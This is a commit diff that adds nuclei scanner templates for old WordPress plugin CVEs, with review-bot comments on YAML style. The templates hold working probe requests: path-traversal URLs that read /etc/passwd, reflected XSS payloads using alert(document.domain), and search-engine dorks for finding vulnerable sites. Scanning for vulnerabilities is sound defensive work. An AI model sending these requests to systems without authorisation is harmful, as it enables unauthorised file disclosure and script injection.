
20241215
actions-user committed Dec 15, 2024
1 parent 62bad0f commit dc2bed7
Showing 99 changed files with 5,526 additions and 1 deletion.
2 changes: 1 addition & 1 deletion date.txt
@@ -1 +1 @@
20241214
20241215
97 changes: 97 additions & 0 deletions poc.txt


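--- a/poc/auth/ider-login.yaml
+++ b/poc/auth/ider-login.yaml
@@ -0,0 +1,59 @@
+id: ider-login-77ccffccfac1bb6eac46823913cc705c
+
+info:
+name: >
+IDer Login for WordPress <= 2.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+author: topscoder
+severity: low
+description: >
+reference:
+- https://github.com/topscoder/nuclei-wordfence-cve
+- https://www.wordfence.com/threat-intel/vulnerabilities/id/de602cf8-cc02-4459-aa23-5d8236048bca?source=api-scan
+classification:
+cvss-metrics:
+cvss-score:
+cve-id:
+metadata:
+fofa-query: "wp-content/plugins/ider-login/"
+google-query: inurl:"/wp-content/plugins/ider-login/"
+shodan-query: 'vuln:'
+tags: cve,wordpress,wp-plugin,ider-login,low
+
+http:
+- method: GET
+redirects: true
+max-redirects: 3
+path:
+- "{{BaseURL}}/wp-content/plugins/ider-login/readme.txt"
+
+extractors:
+- type: regex
+name: version
+part: body
+group: 1
+internal: true
+regex:
+- "(?mi)Stable tag: ([0-9.]+)"
+
+- type: regex
+name: version
+part: body
+group: 1
+regex:
+- "(?mi)Stable tag: ([0-9.]+)"
+
+matchers-condition: and
+matchers:
+- type: status
+status:
+- 200
+
+- type: word
+words:
+- "ider-login"
+part: body
+
+- type: dsl
+dsl:
+- compare_versions(version, '<= 2.1')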
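Review bot: `description: >` in the info block is a folded scalar with no content, and `cvss-metrics:`, `cvss-score:` and `cve-id:` under `classification` are bare keys, so all four load as empty/null while the `tags` line still advertises `cve`. Either fill them from the referenced Wordfence record or drop the empty keys and the `cve` tag so the template does not claim a classification it does not carry; `shodan-query: 'vuln:'` also reads like an unfilled placeholder. Separately, both extractors are named `version`, one `internal: true` and one exported, over the same regex; the DSL matcher only needs the internal one, so the second extractor is redundant unless the exported value is wanted in scan output, and a comment such as `# exported copy of version for reporting` should say so if it stays.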
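--- a/poc/cve/CVE-2011-1669-2041.yaml
+++ b/poc/cve/CVE-2011-1669-2041.yaml
@@ -0,0 +1,27 @@
+id: CVE-2011-1669
+
+info:
+name: WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI)
+author: daffainfo
+severity: high
+description: Directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter.
+reference:
+- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1669
+- https://www.exploit-db.com/exploits/17119
+tags: cve,cve2011,wordpress,wp-plugin,lfi
+
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
+
+matchers-condition: and
+matchers:
+
+- type: regex
+regex:
+- "root:.*:0:0"
+
+- type: status
+status:
+- 200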
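Review bot: This template uses the legacy top-level `requests:` key while `poc/auth/ider-login.yaml` in the same commit uses `http:`; as far as I know newer nuclei releases accept `requests` only as a deprecated alias, so the two forms should not be mixed within one commit and the older one should be migrated to `http:`. The same legacy key appears in CVE-2011-5179, CVE-2012-4768, CVE-2013-4625, CVE-2015-5471, CVE-2016-1000129, CVE-2016-1000133, CVE-2016-1000140, CVE-2016-1000141 and CVE-2016-10956. This file also has no `classification` block (cvss vector, score, cve-id, cwe-id) of the kind the later CVE templates carry, so `severity: high` is not backed by a score here.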
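--- a/poc/cve/CVE-2011-5179-2110.yaml
+++ b/poc/cve/CVE-2011-5179-2110.yaml
@@ -0,0 +1,30 @@
+id: CVE-2011-5179
+
+info:
+name: Skysa App Bar 1.04 - Reflected Cross-Site Scripting (XSS)
+author: daffainfo
+severity: medium
+description: Cross-site scripting (XSS) vulnerability in skysa-official/skysa.php in Skysa App Bar Integration plugin, possibly before 1.04, for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.
+reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5179
+tags: cve,cve2011,wordpress,xss,wp-plugin
+
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "</script><script>alert(document.domain)</script>"
+part: body
+
+- type: word
+part: header
+words:
+- text/html
+
+- type: status
+status:
+- 200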
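Review bot: `reference:` in the info block is a single plain scalar here, whereas the other templates in this commit (CVE-2011-1669, CVE-2015-5471, CVE-2016-10956) give it as a list; nuclei appears to accept both, but tooling that iterates references gets a string in one file and a sequence in the next. Write it as `reference:` followed by `- https://nvd.nist.gov/vuln/detail/CVE-2011-5179`. The same scalar form appears in CVE-2012-4768, CVE-2013-4625, CVE-2016-1000129, CVE-2016-1000133 and CVE-2016-1000140. The `name` states `1.04` flatly while the description says "possibly before 1.04"; the title should carry the same uncertainty about the affected range.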
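--- a/poc/cve/CVE-2012-4768-2206.yaml
+++ b/poc/cve/CVE-2012-4768-2206.yaml
@@ -0,0 +1,30 @@
+id: CVE-2012-4768
+
+info:
+name: WordPress Plugin Download Monitor < 3.3.5.9 - Reflected Cross-Site Scripting (XSS)
+author: daffainfo
+severity: medium
+description: Cross-site scripting (XSS) vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI.
+reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4768
+tags: cve,cve2012,wordpress,xss,wp-plugin
+
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "</script><script>alert(document.domain)</script>"
+part: body
+
+- type: word
+part: header
+words:
+- text/html
+
+- type: status
+status:
+- 200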
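Review bot: The request goes to the site root (`{{BaseURL}}/?dlsearch=…`) rather than a plugin-specific path, so nothing in the template verifies that Download Monitor is present; any theme or other plugin that reflects the `dlsearch` query parameter unescaped produces the same match and gets attributed to this CVE. Consider tying the finding to the plugin — a word matcher on `wp-content/plugins/download-monitor` in the body, or a preceding readme request as `poc/auth/ider-login.yaml` does — and add a comment such as `# root URI is the documented vector; plugin presence is not otherwise checked` so the false-positive surface is explicit to anyone triaging results.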
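--- a/poc/cve/CVE-2013-4625-2266.yaml
+++ b/poc/cve/CVE-2013-4625-2266.yaml
@@ -0,0 +1,30 @@
+id: CVE-2013-4625
+
+info:
+name: WordPress Plugin Duplicator < 0.4.5 - Reflected Cross-Site Scripting (XSS)
+author: daffainfo
+severity: medium
+description: Cross-site scripting (XSS) vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter.
+reference: https://nvd.nist.gov/vuln/detail/CVE-2013-4625
+
+
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "</script><script>alert(document.domain)</script>"
+part: body
+
+- type: word
+part: header
+words:
+- text/html
+
+- type: status
+status:
+- 200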
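Review bot: The info block has no `tags:` key — the two consecutive blank lines after `reference:`, where every sibling template carries its tags, suggest the line was dropped — so this template is invisible to tag-based selection such as `wordpress`, `xss` or `cve2013`. Add `tags: cve,cve2013,wordpress,xss,wp-plugin` after the reference line and collapse the double blank line to one.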
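--- a/poc/cve/CVE-2015-5471-2557.yaml
+++ b/poc/cve/CVE-2015-5471-2557.yaml
@@ -0,0 +1,34 @@
+id: CVE-2015-5471
+info:
+name: Swim Team <= v1.44.10777 - Local File Inclusion
+author: 0x_Akoko
+severity: medium
+description: The program /wp-swimteam/include/user/download.php allows unauthenticated attackers to retrieve arbitrary files from the system.
+reference:
+- https://wpscan.com/vulnerability/b00d9dda-721d-4204-8995-093f695c3568
+- http://www.vapid.dhs.org/advisory.php?v=134
+- https://nvd.nist.gov/vuln/detail/CVE-2015-5471
+- http://packetstormsecurity.com/files/132653/WordPress-WP-SwimTeam-1.44.10777-Arbitrary-File-Download.html
+remediation: Upgrade to Swim Team version 1.45 or newer.
+classification:
+cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+cvss-score: 5.3
+cve-id: CVE-2015-5471
+cwe-id: CWE-22
+metadata:
+google-query: inurl:"/wp-content/plugins/wp-swimteam"
+tags: cve,cve2015,wordpress,wp-plugin,lfi
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress"
+matchers-condition: and
+matchers:
+- type: regex
+regex:
+- "root:[x*]:0:0"
+- type: status
+status:
+- 200
+
+# Enhanced by cs on 2022/02/25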
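Review bot: The body regex `root:[x*]:0:0` only matches a `root` entry whose second field is exactly one character (`x` or `*`), while the two other LFI templates in this commit use `root:.*:0:0` (CVE-2011-1669) and `root:.*:0:0:` (CVE-2016-10956); three different patterns for the same evidence make the outcome depend on which template happened to fire. Pick one form for all three and record it in a comment, e.g. `# shared passwd-evidence regex; keep in sync with the other lfi templates`, so future templates copy it. The `abspath=/usr/share/wordpress` parameter hard-codes one distribution's install path; if the plugin resolves the file relative to it, hosts installed elsewhere will not match, and that assumption deserves a comment on the `path` entry.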
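--- a/poc/cve/CVE-2016-1000129-2655.yaml
+++ b/poc/cve/CVE-2016-1000129-2655.yaml
@@ -0,0 +1,30 @@
+id: CVE-2016-1000129
+info:
+name: defa-online-image-protector <= 3.3 - Reflected Cross-Site Scripting (XSS)
+author: daffainfo
+severity: medium
+description: Reflected XSS in wordpress plugin defa-online-image-protector v3.3
+reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000129
+tags: cve,cve2016,wordpress,xss,wp-plugin
+classification:
+cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+cvss-score: 6.10
+cve-id: CVE-2016-1000129
+cwe-id: CWE-79
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/wp-content/plugins/defa-online-image-protector/redirect.php?r=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "</script><script>alert(document.domain)</script>"
+part: body
+- type: word
+part: header
+words:
+- text/html
+- type: status
+status:
+- 200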
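Review bot: `cvss-score: 6.10` is an unquoted float, so any YAML loader reads it as 6.1 and the trailing zero survives nowhere; at best it is cosmetic, at worst it reads like a version string. Write `cvss-score: 6.1`, which is also the score the listed vector `CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N` evaluates to. The same `6.10` appears in CVE-2016-1000133, CVE-2016-1000140 and CVE-2016-1000141. The `name` uses the plugin slug `defa-online-image-protector` where the other templates use a display name; the slug is fine as an identifier but a reader of scan output will not recognise it.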
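--- a/poc/cve/CVE-2016-1000133-2675.yaml
+++ b/poc/cve/CVE-2016-1000133-2675.yaml
@@ -0,0 +1,35 @@
+id: CVE-2016-1000133
+
+info:
+name: forget-about-shortcode-buttons 1.1.1 - Reflected Cross-Site Scripting (XSS)
+author: daffainfo
+severity: medium
+description: Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1
+reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000133
+tags: cve,cve2016,wordpress,xss,wp-plugin
+classification:
+cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+cvss-score: 6.10
+cve-id: CVE-2016-1000133
+cwe-id: CWE-79
+
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "</script><script>alert(document.domain)</script>"
+part: body
+
+- type: word
+part: header
+words:
+- text/html
+
+- type: status
+status:
+- 200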
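Review bot: `name` and `description` state the version as a bare `1.1.1`, while the sibling templates give a range (`<= 2.1`, `< 3.3.5.9`, `<= 3.3`), so a reader cannot tell whether only that release or every release up to it is affected. If the NVD record gives a range, write `forget-about-shortcode-buttons <= 1.1.1 - Reflected Cross-Site Scripting (XSS)`; if it does not, say "version 1.1.1" explicitly in the description. The description otherwise just repeats the title; naming the vulnerable script and parameter that the request already shows (`popup.php`, `ver`) would make the finding self-explanatory in reports.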
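--- a/poc/cve/CVE-2016-1000140-2703.yaml
+++ b/poc/cve/CVE-2016-1000140-2703.yaml
@@ -0,0 +1,35 @@
+id: CVE-2016-1000140
+
+info:
+name: New Year Firework <= 1.1.9 - Reflected Cross-Site Scripting (XSS)
+author: daffainfo
+severity: medium
+reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000140
+tags: cve,cve2016,wordpress,xss,wp-plugin
+classification:
+cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+cvss-score: 6.10
+cve-id: CVE-2016-1000140
+cwe-id: CWE-79
+description: "Reflected XSS in wordpress plugin new-year-firework v1.1.9"
+
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/wp-content/plugins/new-year-firework/firework/index.php?text=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "</script><script>alert(document.domain)</script>"
+part: body
+
+- type: word
+part: header
+words:
+- text/html
+
+- type: status
+status:
+- 200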
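Review bot: `description` is placed after `classification` in this info block, whereas every other template in this commit puts it directly after `severity`; mappings are unordered so nuclei does not care, but the odd position hurts diffability and makes the block harder to review against its siblings. Move `description: "Reflected XSS in wordpress plugin new-year-firework v1.1.9"` up to follow `severity: medium`. It is also the only description here written in double quotes while the others are plain scalars; either is valid, but pick one form across the commit.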
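--- a/poc/cve/CVE-2016-1000141-2707.yaml
+++ b/poc/cve/CVE-2016-1000141-2707.yaml
@@ -0,0 +1,35 @@
+id: CVE-2016-1000141
+info:
+name: WordPress Page Layout builder v1.9.3 - Reflected Cross-Site Scripting
+author: daffainfo
+severity: medium
+description: WordPress plugin Page-layout-builder v1.9.3 contains a cross-site scripting vulnerability.
+remediation: Upgrade to version 2.0 or higher.
+reference:
+- http://www.vapidlabs.com/wp/wp_advisory.php?v=358
+- https://nvd.nist.gov/vuln/detail/CVE-2016-1000141
+tags: cve,cve2016,wordpress,xss,wp-plugin
+classification:
+cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+cvss-score: 6.10
+cve-id: CVE-2016-1000141
+cwe-id: CWE-79
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "</script><script>alert(document.domain)</script>"
+part: body
+- type: word
+part: header
+words:
+- text/html
+- type: status
+status:
+- 200
+
+# Enhanced by mp on 2022/03/24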
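--- a/poc/cve/CVE-2016-10956-2762.yaml
+++ b/poc/cve/CVE-2016-10956-2762.yaml
@@ -0,0 +1,34 @@
+id: CVE-2016-10956
+
+info:
+name: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI)
+author: daffainfo,0x240x23elu
+severity: high
+description: The mail-masta plugin 1.0 for WordPress has local file inclusion in count_of_send.php and csvexport.php.
+reference:
+- https://cxsecurity.com/issue/WLB-2016080220
+- https://wpvulndb.com/vulnerabilities/8609
+- https://wordpress.org/plugins/mail-masta/#developers
+classification:
+cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+cvss-score: 7.5
+cve-id: CVE-2016-10956
+cwe-id: CWE-20
+tags: cve,cve2016,wordpress,wp-plugin,lfi,mail
+
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd"
+- "{{BaseURL}}/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd"
+
+matchers-condition: and
+matchers:
+- type: regex
+regex:
+- "root:.*:0:0:"
+part: body
+- type: status
+status:
+- 200
+- 500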
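Review bot: `cwe-id: CWE-20` sits next to an `lfi` tag and a description of local file inclusion, while the other LFI template in this commit (CVE-2015-5471) uses `CWE-22`; if the authoritative record for CVE-2016-10956 really lists CWE-20, keep it and add `# CWE-20 per the NVD entry, not CWE-22` so the next reader does not "fix" it, otherwise `cwe-id: CWE-22` is the consistent choice. The `https://wpvulndb.com/vulnerabilities/8609` reference uses the old domain; CVE-2015-5471 in the same commit already cites the `wpscan.com/vulnerability/…` form, so this link should be updated if it still resolves. The status matcher deliberately accepts both `200` and `500` together with the body regex, which is reasonable but non-obvious; a one-line comment on the `- 500` entry explaining why a server error still counts would help.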
